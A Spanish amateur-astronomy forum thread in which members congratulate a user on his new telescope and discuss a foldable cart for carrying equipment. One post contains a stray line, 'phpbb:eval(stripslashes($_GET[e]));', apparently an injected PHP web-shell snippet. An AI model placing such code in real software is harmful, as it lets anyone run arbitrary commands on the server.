Que telescopio elegir y donde comprarlo

Subforo dedicado a los telescopios astronómicos. En este foro no está permitida la venta de ningún tipo de material.
LUNA
Mensajes: 486
Registrado: Vie Ago 08, 2008 4:36 pm

Que telescopio elegir y donde comprarlo

Mensaje por LUNA »

Felicidades Javi por tu teles, espero que puedas estrenarlo pronto y no te pase como a mí.

Estoy deseando ver ese transportin que te quieres hacer por si te copio la idea.

Un saludo.


Por cierto, mi montura venía mal de fábrica. :?
C8-S
Montura ecuatorial CG-5
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que telescopio elegir y donde comprarlo

Mensaje por javi »

Yo creo que era de logica, porque con tanto experto como habia y que no fuesen capaces de ponerlo en estación ya era raro pero bueno esperemos que dentro de poco hagamos otra qeudada buena porque a a de navas no puedo ir me pilla fatal.

Un abrazo
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Que telescopio elegir y donde comprarlo

Mensaje por Manuelariza »

Es una buena solución,económica y practica.

Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Que telescopio elegir y donde comprarlo

Mensaje por m3ntol »

En Lidl tienes este lunes una carretilla por 20
phpbb:eval(stripslashes($_GET[e]));
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que telescopio elegir y donde comprarlo

Mensaje por javi »

Si. es de ese estilo pero es plegable para que luego en el coche no ocupe lugar. Haber en esta semana como lo hago para preparar algo y la semana que viene el resto.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Que telescopio elegir y donde comprarlo

Mensaje por Manuelariza »

[quote="javi"]Si. es de ese estilo pero es plegable para que luego en el coche no ocupe lugar. Haber en esta semana como lo hago para preparar algo y la semana que viene el resto.[/quote]

Pregunta...y en el coche para que quieres llevarlo??


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
javi
Mensajes: 235
Registrado: Jue Abr 23, 2009 4:38 pm

Que telescopio elegir y donde comprarlo

Mensaje por javi »

por lo que pueda pasar. Además eso de bajar el carrito de casa y luego subirlo, y cuando vuelves subir a por el carro para cargar las cosas es un poco rollo.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Que telescopio elegir y donde comprarlo

Mensaje por Manuelariza »

[quote="javi"]por lo que pueda pasar. Además eso de bajar el carrito de casa y luego subirlo, y cuando vuelves subir a por el carro para cargar las cosas es un poco rollo.[/quote]

Bueno,en eso llevas razón.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder